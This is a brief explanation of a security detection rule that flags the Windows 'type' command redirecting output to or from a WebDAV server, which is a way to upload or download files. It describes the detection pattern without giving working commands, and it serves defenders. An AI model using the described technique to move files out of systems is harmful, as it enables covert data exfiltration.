This detection rule identifies potential malicious activity using the Windows 'type' command which is typically utilized for displaying file contents. However, in a nefarious context, it can be employed to download or upload files from a WebDAV server. The rule specifies two selection conditions: one for detecting upload activity and another for download activity based on the structure of the command line. The upload behavior is characterized by the presence of the 'type' command followed by a redirection operator (>) pointing to a WebDAV address. Conversely, the download behavior utilizes a similar approach, with the command potentially pointing to a local file system. The detection is triggered when either selection condition is met, enabling security teams to flag and investigate suspicious use of this command in their environment.